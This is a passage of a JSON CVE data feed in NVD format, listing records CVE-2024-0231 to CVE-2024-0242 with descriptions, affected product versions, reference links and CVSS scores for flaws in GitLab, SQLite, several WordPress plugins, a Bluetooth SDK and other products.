[ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "PHYSICAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 2.4, "baseSeverity" : "LOW" }, "exploitabilityScore" : 0.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-12T23:15Z", "lastModifiedDate" : "2025-06-03T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0231", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-74" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/437103", "name" : "GitLab Issue #437103", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/437103", "name" : "GitLab Issue #437103", "refsource" : "", "tags" : [ "Issue Tracking", "Vendor Advisory" ] }, { "url" : "https://hackerone.com/reports/2299337", "name" : "HackerOne Bug Bounty Report #2299337", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://hackerone.com/reports/2299337", "name" : "HackerOne Bug Bounty Report #2299337", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A resource misdirection vulnerability in GitLab CE/EE versions 12.0 prior to 17.0.5, 17.1 prior to 17.1.3, and 17.2 prior to 17.2.1 allows an attacker to craft a repository import in such a way as to misdirect commits." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "17.1.0", "versionEndExcluding" : "17.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "17.1.0", "versionEndExcluding" : "17.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.2.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:17.2.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "12.0.0", "versionEndExcluding" : "17.0.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "12.0.0", "versionEndExcluding" : "17.0.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 2.7, "baseSeverity" : "LOW" }, "exploitabilityScore" : 1.2, "impactScore" : 1.4 } }, "publishedDate" : "2024-07-24T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0232", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-416" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0232", "name" : "https://access.redhat.com/security/cve/CVE-2024-0232", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0232", "name" : "https://access.redhat.com/security/cve/CVE-2024-0232", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2243754", "name" : "RHBZ#2243754", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2243754", "name" : "RHBZ#2243754", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240315-0007/", "name" : "https://security.netapp.com/advisory/ntap-20240315-0007/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sqlite:sqlite:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.43.0", "versionEndExcluding" : "3.43.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-16T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0233", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" }, { "lang" : "en", "value" : "CWE-116" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/", "name" : "https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/", "name" : "https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionStartIncluding" : "4.0", "versionEndExcluding" : "4.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-06-20T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0235", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/", "name" : "https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/", "name" : "https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionStartIncluding" : "4.0", "versionEndExcluding" : "4.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-06-20T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0236", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/", "name" : "https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/", "name" : "https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionStartIncluding" : "4.0", "versionEndExcluding" : "4.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-06-20T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0237", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/", "name" : "https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/", "name" : "https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EventON WordPress plugin through 4.5.8, EventON WordPress plugin before 2.2.7 do not have authorisation in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionStartIncluding" : "4.0", "versionEndExcluding" : "4.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-06-02T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0238", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" }, { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/", "name" : "https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/", "name" : "https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The EventON Premium WordPress plugin before 4.5.6, EventON WordPress plugin before 2.2.8 do not have authorisation in an AJAX action, and does not ensure that the post to be updated belong to the plugin, allowing unauthenticated users to update arbitrary post metadata." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.2.7", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*", "versionStartIncluding" : "4.0", "versionEndExcluding" : "4.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-06-02T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0239", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/", "name" : "https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/", "refsource" : "", "tags" : [ "Exploit", "Product", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/", "name" : "https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/", "refsource" : "", "tags" : [ "Exploit", "Product", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ari-soft:contact_form_7_connector:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.2.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-16T16:15Z", "lastModifiedDate" : "2025-05-09T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0240", "ASSIGNER" : "product-security@silabs.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-401" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://community.silabs.com/069Vm000001AjEfIAK", "name" : "https://community.silabs.com/069Vm000001AjEfIAK", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://community.silabs.com/069Vm000001AjEfIAK", "name" : "https://community.silabs.com/069Vm000001AjEfIAK", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://github.com/SiliconLabs/gecko_sdk", "name" : "https://github.com/SiliconLabs/gecko_sdk", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/SiliconLabs/gecko_sdk", "name" : "https://github.com/SiliconLabs/gecko_sdk", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A memory leak in the Silicon Labs' Bluetooth stack for EFR32 products may cause memory to be exhausted when sending notifications to multiple clients, this results in all Bluetooth operations, such as advertising and scanning, to stop." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:silabs:gecko_software_development_kit:*:*:*:*:*:*:*:*", "versionEndExcluding" : "4.3.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "ADJACENT_NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-15T21:15Z", "lastModifiedDate" : "2025-02-05T22:37Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0241", "ASSIGNER" : "disclosure@vulncheck.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-770" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/advisories/GHSA-3px7-jm2p-6h2c", "name" : "https://github.com/advisories/GHSA-3px7-jm2p-6h2c", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/advisories/GHSA-3px7-jm2p-6h2c", "name" : "https://github.com/advisories/GHSA-3px7-jm2p-6h2c", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91", "name" : "https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91", "name" : "https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c", "name" : "https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c", "name" : "https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c", "name" : "https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c", "name" : "https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "encoded_id-rails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial of service condition by sending an HTTP request with an extremely long \"id\" parameter.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:diaconou:encodedid\\:\\:rails:1.0.0:beta1:*:*:*:ruby:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:diaconou:encodedid\\:\\:rails:*:*:*:*:*:ruby:*:*", "versionEndExcluding" : "1.0.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:diaconou:encodedid\\:\\:rails:1.0.0:-:*:*:*:ruby:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-04T21:15Z", "lastModifiedDate" : "2025-06-18T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0242", "ASSIGNER" : "productsecurity@jci.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.johnsoncontrols.com/cyber-solutions/security-advisories", "name" : "https://www.johnsoncontrols.com/cyber-solutions/security-advisories", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.johnsoncontrols.com/cyber-solutions/security-advisories", "name" : "https://www.johnsoncontrols.com/cyber-solutions/security-advisories", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Under certain circumstances IQ Panel4 and IQ4 Hub panel software prior to version 4.4.2 could allow unauthorized access to settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:johnsoncontrols:qolsys_iq_panel_4_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "4.4.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:johnsoncontrols:qolsys_iq_panel_4:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:johnsoncontrols:qolsys_iq4_hub_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "4.4.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:johnsoncontrols:qolsys_iq4_hub:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-08T20:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", 